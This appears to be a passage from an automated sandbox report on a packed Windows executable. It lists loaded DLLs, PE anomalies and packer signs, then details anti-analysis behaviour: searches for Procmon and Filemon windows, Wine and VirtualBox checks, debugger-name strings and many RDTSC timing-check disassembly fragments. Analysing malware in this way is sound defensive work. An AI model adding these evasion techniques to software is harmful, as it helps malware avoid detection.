Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: kernel.appcore.dll
Source: ivHDHq51Ar.exe | Static file information: File size 4514816 > 1048576
Source: ivHDHq51Ar.exe | Static PE information: Raw size of (unnamed section) is bigger than: 0x100000 < 0x289a00
Source: ivHDHq51Ar.exe | Static PE information: Raw size of niwiuhuq is bigger than: 0x100000 < 0x1c0e00

Data Obfuscation

Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Unpacked PE file: 0.2.ivHDHq51Ar.exe.150000.0.unpack :EW;.rsrc:W;.idata :W; :EW;niwiuhuq:EW;akfmfqsl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;niwiuhuq:EW;akfmfqsl:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: ivHDHq51Ar.exe | Static PE information: real checksum: 0x4558aa should be: 0x450f36
Source: ivHDHq51Ar.exe | Static PE information: section name:
Source: ivHDHq51Ar.exe | Static PE information: section name: .idata
Source: ivHDHq51Ar.exe | Static PE information: section name:
Source: ivHDHq51Ar.exe | Static PE information: section name: niwiuhuq
Source: ivHDHq51Ar.exe | Static PE information: section name: akfmfqsl
Source: ivHDHq51Ar.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_3_014E3AA0 push eax; ret (0_3_014E3AA1)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_3_01500BEB push es; ret (0_3_01500C49)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_3_01500BEB push es; ret (0_3_01500C49)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_3_01500BEB push es; ret (0_3_01500C49)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_3_01500BEB push es; ret (0_3_01500C49)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004D41D0 push eax; mov dword ptr [esp], edx (0_2_004D41D5)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_001D2340 push eax; mov dword ptr [esp], 00000000h (0_2_001D2343)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0020C7F0 push eax; mov dword ptr [esp], 00000000h (0_2_0020C743)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_00190AC0 push eax; mov dword ptr [esp], 00000000h (0_2_00190AC4)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_001B1430 push eax; mov dword ptr [esp], 00000000h (0_2_001B1433)
Source: ivHDHq51Ar.exe | Static PE information: section name: niwiuhuq entropy: 7.9555945069961025

Boot Survival

Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Window searched: window name: PROCMON_WINDOW_CLASS

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D7FD3 second address: 9D7FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D7FDB second address: 9D7FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE1010EA790h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9BCBE3 second address: 9BCBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9BCBE9 second address: 9BCBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA790h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D6FF0 second address: 9D6FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D7684 second address: 9D76A5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FE1010EA790h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D782A second address: 9D7836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D7836 second address: 9D783C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D783C second address: 9D7853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E17072h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D7853 second address: 9D7889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE1010EA78Eh 0x0000000a popad 0x0000000b push edx 0x0000000c jc 00007FE1010EA786h 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 push edi 0x00000019 pop edi 0x0000001a jp 00007FE1010EA786h 0x00000020 pop edi 0x00000021 jno 00007FE1010EA78Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D7889 second address: 9D7897 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE100E17068h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D7897 second address: 9D789D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D9DF2 second address: 9D9DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D9DF6 second address: 9D9E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FE1010EA78Ch 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jns 00007FE1010EA799h 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007FE1010EA78Fh 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE1010EA796h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D9E42 second address: 9D9E48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D9E8C second address: 9D9E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D9E91 second address: 9D9E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D9E97 second address: 9D9EE8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FE1010EA795h 0x00000014 pop edx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 jns 00007FE1010EA789h 0x0000001e push 2EFEC436h 0x00000023 pushad 0x00000024 jmp 00007FE1010EA798h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D9EE8 second address: 9D9F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 xor dword ptr [esp], 2EFEC4B6h 0x0000000f mov edx, edi 0x00000011 push 00000003h 0x00000013 pushad 0x00000014 clc 0x00000015 pushad 0x00000016 mov si, EEB3h 0x0000001a mov dl, D4h 0x0000001c popad 0x0000001d popad 0x0000001e push 00000000h 0x00000020 stc 0x00000021 push 00000003h 0x00000023 jnc 00007FE100E17069h 0x00000029 mov si, di 0x0000002c sub edi, dword ptr [ebp+129E1BE2h] 0x00000032 call 00007FE100E17069h 0x00000037 jmp 00007FE100E17077h 0x0000003c push eax 0x0000003d jne 00007FE100E17070h 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FE100E1706Eh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D9F5F second address: 9D9F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA799h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9D9F7C second address: 9D9FFB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE100E17066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jnc 00007FE100E1706Ch 0x00000015 jmp 00007FE100E1706Fh 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007FE100E17077h 0x00000024 pop eax 0x00000025 pushad 0x00000026 mov esi, dword ptr [ebp+129E3979h] 0x0000002c add dword ptr [ebp+129E1C2Ch], ecx 0x00000032 popad 0x00000033 clc 0x00000034 lea ebx, dword ptr [ebp+12B63D2Bh] 0x0000003a mov dword ptr [ebp+129E1BE7h], edi 0x00000040 mov dword ptr [ebp+129E1D09h], edi 0x00000046 push eax 0x00000047 push ebx 0x00000048 pushad 0x00000049 jmp 00007FE100E17072h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9DA05A second address: 9DA083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE1010EA786h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FE1010EA792h 0x00000015 ja 00007FE1010EA786h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9DA083 second address: 9DA0DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov esi, dword ptr [ebp+129E3BE5h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FE100E17068h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov esi, dword ptr [ebp+129E3A81h] 0x00000031 push DF93EB37h 0x00000036 pushad 0x00000037 jmp 00007FE100E17078h 0x0000003c push eax 0x0000003d push edx 0x0000003e push edx 0x0000003f pop edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9DA1F2 second address: 9DA1F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA0AD second address: 9FA0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jnl 00007FE100E17066h 0x0000000c jns 00007FE100E17066h 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007FE100E17073h 0x0000001c jc 00007FE100E1706Eh 0x00000022 jns 00007FE100E17066h 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9CD9FA second address: 9CDA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE1010EA786h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA250 second address: 9FA28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE100E17073h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE100E17077h 0x00000015 jl 00007FE100E17066h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA3D1 second address: 9FA3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA6DF second address: 9FA6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA6E3 second address: 9FA6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA6E9 second address: 9FA6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA6F2 second address: 9FA70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA794h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA9A3 second address: 9FA9BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA9BB second address: 9FA9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA9C0 second address: 9FA9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E1706Dh 0x00000009 jc 00007FE100E17066h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FA9E3 second address: 9FAA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA798h 0x00000009 jbe 00007FE1010EA786h 0x0000000f popad 0x00000010 jc 00007FE1010EA788h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FAB10 second address: 9FAB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE100E17070h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FAB2D second address: 9FAB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FAB33 second address: 9FAB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FE100E1706Ch 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FAB4C second address: 9FAB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FAB58 second address: 9FAB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE100E17075h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9CDA09 second address: 9CDA32 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 jmp 00007FE1010EA795h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FAE2A second address: 9FAE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FAE30 second address: 9FAE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FB57E second address: 9FB584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FB7F1 second address: 9FB7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FB7F7 second address: 9FB7FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FB7FB second address: 9FB820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FE1010EA793h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jns 00007FE1010EA786h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FB820 second address: 9FB851 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE100E17068h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FE100E17066h 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jnl 00007FE100E1706Ch 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FB851 second address: 9FB857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FB857 second address: 9FB85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FB85B second address: 9FB85F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FB9B2 second address: 9FB9C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FBC89 second address: 9FBC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FBC8F second address: 9FBCAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FE100E17066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007FE100E1706Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FBCAC second address: 9FBCEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA796h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jng 00007FE1010EA79Ah 0x00000011 push edi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | RDTSC instruction interceptor: First address: 9FD316 second address: 9FD32D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007FE100E17066h 0x0000000e ja 00007FE100E17066h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
